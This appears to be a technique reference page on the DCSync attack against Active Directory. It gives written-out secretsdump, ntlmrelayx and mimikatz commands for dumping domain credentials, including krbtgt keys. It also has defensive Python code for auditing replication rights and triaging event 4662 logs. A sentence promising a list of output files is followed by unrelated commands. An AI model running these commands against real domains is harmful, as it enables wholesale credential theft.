MITRE ATT&CK™ Sub-technique T1003.006
DCSync is a technique that uses a Windows Domain Controller's API to simulate the replication process from a remote domain controller. This attack can lead to the compromise of major credential material such as the Kerberos krbtgt keys, used legitimately for ticket creation but also for ticket forging by attackers. The consequences of this attack are similar to an NTDS.dit dump and parsing, but the practical aspects differ: a DCSync is not a simple copy & parse of the NTDS.dit file, it's a DsGetNCChanges operation transported in an RPC request to the DRSUAPI (Directory Replication Service API) to replicate data (including credentials) from a domain controller.
This attack requires domain admin privileges to succeed (more specifically, it needs the following extended privileges: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. In some cases, over-privileged accounts can be abused to grant controlled objects the right to DCSync.
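Because the technique hinges on those two extended rights, the defender-side check is to audit who holds them on the domain naming context. The following is an added example, not code from the original page: it parses the domain object's security descriptor in SDDL form (as exposed by nTSecurityDescriptor or dsacls-style tooling), collects the allow and deny ACEs for the two replication extended rights per trustee, and reports every principal that ends up with both, separating those outside the expected set. The SDDL string and the domain SID are constructed; the extended-right GUIDs are the real ones.

```python
"""
Audit which principals hold the extended rights that allow a DCSync against a
domain naming context, from the object's security descriptor in SDDL form.
Added example for this page, not code from the original; the SDDL string and
domain SID below are constructed (the GUIDs are the real extended-right GUIDs).
"""
import re
from collections import defaultdict

GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"       # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"   # DS-Replication-Get-Changes-All
REPL_RIGHTS = {GET_CHANGES: "DS-Replication-Get-Changes",
               GET_CHANGES_ALL: "DS-Replication-Get-Changes-All"}

# Trustees expected to hold both rights: Builtin Administrators (BA), Domain Admins (DA),
# Enterprise Admins (EA), Enterprise Domain Controllers (ED) and the Domain Controllers
# group of this domain (RID 516).
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed
EXPECTED = {"BA", "DA", "EA", "ED", f"{DOMAIN_SID}-516"}

# One SDDL ACE is (type;flags;rights;object_guid;inherit_object_guid;trustee).
ACE_RE = re.compile(r"\(([^)]*)\)")

SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    # defaults: BA, ED and the Domain Controllers group hold both rights
    f"(OA;;CR;{GET_CHANGES};;BA)(OA;;CR;{GET_CHANGES_ALL};;BA)"
    f"(OA;;CR;{GET_CHANGES};;ED)(OA;;CR;{GET_CHANGES_ALL};;ED)"
    f"(OA;;CR;{GET_CHANGES};;{DOMAIN_SID}-516)(OA;;CR;{GET_CHANGES_ALL};;{DOMAIN_SID}-516)"
    # a service account (RID 1105) that was granted both rights: the finding
    f"(OA;;CR;{GET_CHANGES};;{DOMAIN_SID}-1105)(OA;;CR;{GET_CHANGES_ALL};;{DOMAIN_SID}-1105)"
    # RID 1106 holds only Get-Changes: cannot replicate secrets on its own
    f"(OA;;CR;{GET_CHANGES};;{DOMAIN_SID}-1106)"
    # RID 1107 is granted both but explicitly denied Get-Changes-All
    f"(OD;;CR;{GET_CHANGES_ALL};;{DOMAIN_SID}-1107)"
    f"(OA;;CR;{GET_CHANGES};;{DOMAIN_SID}-1107)(OA;;CR;{GET_CHANGES_ALL};;{DOMAIN_SID}-1107)"
)


def dacl_aces(sddl):
    """Yield (ace_type, rights, object_guid, trustee) for each ACE in the DACL part."""
    dacl = sddl.split("D:", 1)[1]
    dacl = dacl.split("S:", 1)[0]          # drop the SACL if one is present
    for m in ACE_RE.finditer(dacl):
        fields = m.group(1).split(";")
        if len(fields) < 6:
            continue
        ace_type, _flags, rights, obj_guid, _inh_guid, trustee = fields[:6]
        yield ace_type, rights, obj_guid.lower(), trustee


def replication_rights_by_trustee(sddl):
    """Map trustee -> effective set of replication right names (allows minus denies)."""
    allowed, denied = defaultdict(set), defaultdict(set)
    for ace_type, rights, guid, trustee in dacl_aces(sddl):
        if guid not in REPL_RIGHTS or "CR" not in rights:   # CR = control access (extended right)
            continue
        bucket = allowed if ace_type == "OA" else denied if ace_type == "OD" else None
        if bucket is not None:
            bucket[trustee].add(REPL_RIGHTS[guid])
    return {t: r - denied[t] for t, r in allowed.items() if r - denied[t]}


def dcsync_capable(sddl, expected=EXPECTED):
    """Return (all trustees able to DCSync, those not in the expected set), both sorted."""
    both = set(REPL_RIGHTS.values())
    capable = {t for t, r in replication_rights_by_trustee(sddl).items() if both <= r}
    return sorted(capable), sorted(capable - expected)


if __name__ == "__main__":
    capable, unexpected = dcsync_capable(SAMPLE_SDDL)
    print("can DCSync:", capable)
    print("unexpected:", unexpected)
```

The audit only looks at direct trustees; a principal that gets the rights through nested group membership needs the groups resolved against the directory first. Against a forest with RODC filtered attributes, add DS-Replication-Get-Changes-In-Filtered-Set to the mapping the same way.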
```bash
# using a plaintext password
secretsdump -outputfile 'something' 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'

# with Pass-the-Hash
secretsdump -outputfile 'something' -hashes 'LMhash':'NThash' 'DOMAIN'/'USER'@'DOMAINCONTROLLER'

# with Pass-the-Ticket
secretsdump -k -outputfile 'something' 'DOMAIN'/'USER'@'DOMAINCONTROLLER'
```
The secretsdump script creates the following files.
```bash
# target vulnerable to Zerologon, dump DC's secrets only
ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER'

# target vulnerable to Zerologon, dump Domain's secrets
ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'
```
On Windows, mimikatz (C) can be used with `lsadump::dcsync` to operate a DCSync and recover the krbtgt keys, for a golden ticket attack for example. For this attack to work, the following mimikatz commands should be run in an elevated context (i.e. through runas with a plaintext password, pass-the-hash or pass-the-ticket).
```
# Extract a specific user, in this case the krbtgt
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt

# Dump everything (printed in a short and readable format)
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /all /csv
```
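Whichever client is used (secretsdump, ntlmrelayx or mimikatz), what reaches the domain controller is the same DsGetNCChanges replication request, so detection does not depend on the tool. With Directory Service Access auditing enabled on the domain controllers, each such request is logged as Security event 4662 with the replication extended-right GUIDs in its Properties field, and a request whose subject is not a domain controller's machine account is the signal. The following is an added example, not code from the original page: it triages 4662 records, resolves the source address by correlating the logon id with the matching 4624 logon event, and reports requests from unexpected accounts. The event records, account names, logon ids and IP addresses are constructed; the extended-right GUIDs are the real ones.

```python
"""
Triage Windows Security event 4662 records for DCSync-style replication
requests. Added example for this page, not code from the original; the event
records, DC account names, logon ids and IPs below are constructed.
"""
import re

GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"       # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"   # DS-Replication-Get-Changes-All
REPL_RIGHTS = {GET_CHANGES: "DS-Replication-Get-Changes",
               GET_CHANGES_ALL: "DS-Replication-Get-Changes-All"}
CONTROL_ACCESS = 0x100            # AccessMask bit meaning "control access" (extended right)
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Machine accounts that legitimately replicate: the known domain controllers (constructed).
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed 4662 records, reduced to the fields the triage needs. In a real event
# "%%7688" precedes the GUIDs in Properties and AccessMask is a hex string such as "0x100".
SAMPLE_EVENTS = [
    # normal: a known DC replicating from its peer
    {"EventID": 4662, "TimeCreated": "2024-01-10T08:00:01", "SubjectUserName": "DC02$",
     "SubjectLogonId": "0x3e4", "AccessMask": "0x100",
     "Properties": f"%%7688 {{{GET_CHANGES}}} {{{GET_CHANGES_ALL}}}"},
    # suspicious: a user account asking for both replication rights
    {"EventID": 4662, "TimeCreated": "2024-01-10T08:02:17", "SubjectUserName": "svc-backup",
     "SubjectLogonId": "0x7a1b2", "AccessMask": "0x100",
     "Properties": f"%%7688 {{{GET_CHANGES}}} {{{GET_CHANGES_ALL}}}"},
    # not replication: a different extended right (User-Force-Change-Password)
    {"EventID": 4662, "TimeCreated": "2024-01-10T08:03:00", "SubjectUserName": "jdoe",
     "SubjectLogonId": "0x8c001", "AccessMask": "0x100",
     "Properties": "%%7688 {00299570-246d-11d0-a768-00aa006e0529}"},
    # suspicious: a machine account that is not one of the known DCs
    {"EventID": 4662, "TimeCreated": "2024-01-10T08:05:44", "SubjectUserName": "DC03$",
     "SubjectLogonId": "0x9d331", "AccessMask": "0x100",
     "Properties": f"%%7688 {{{GET_CHANGES_ALL}}}"},
]
# Constructed 4624 logon records used to recover where each logon session came from.
SAMPLE_LOGONS = [
    {"EventID": 4624, "TargetLogonId": "0x3e4", "IpAddress": "10.0.0.11"},
    {"EventID": 4624, "TargetLogonId": "0x7a1b2", "IpAddress": "10.0.0.55"},
    {"EventID": 4624, "TargetLogonId": "0x8c001", "IpAddress": "10.0.0.56"},
    {"EventID": 4624, "TargetLogonId": "0x9d331", "IpAddress": "10.0.0.200"},
]


def access_mask(event):
    """AccessMask as an int, whether the record carries it as int or hex string."""
    mask = event.get("AccessMask", 0)
    return int(mask, 16) if isinstance(mask, str) else int(mask)


def replication_rights(event):
    """Names of the replication extended rights a 4662 record asks for (empty if none)."""
    if event.get("EventID") != 4662 or not (access_mask(event) & CONTROL_ACCESS):
        return set()
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return {REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS}


def logon_sources(logon_events):
    """Map logon id -> source IP from 4624 records."""
    return {e["TargetLogonId"]: e.get("IpAddress", "?")
            for e in logon_events if e.get("EventID") == 4624}


def triage(events, logon_events, known_dcs=KNOWN_DC_ACCOUNTS):
    """Replication requests whose subject is not a known DC machine account, in event order."""
    sources = logon_sources(logon_events)
    alerts = []
    for e in events:
        rights = replication_rights(e)
        if not rights or e["SubjectUserName"] in known_dcs:
            continue
        alerts.append({"time": e["TimeCreated"], "user": e["SubjectUserName"],
                       "source": sources.get(e.get("SubjectLogonId"), "?"),
                       "rights": sorted(rights)})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS, SAMPLE_LOGONS):
        print(f"{a['time']} {a['user']} from {a['source']}: {', '.join(a['rights'])}")
```

The allowlist keys on the subject account, not on the source address, because a replication request from a DC's own account is expected traffic while the same request from any user account is not; the 4624 correlation is there so the analyst knows which host to look at. On the network side the same activity is visible as DRSUAPI RPC traffic carrying DsGetNCChanges from a host that is not a domain controller, which complements the event-based check when auditing is not enabled everywhere.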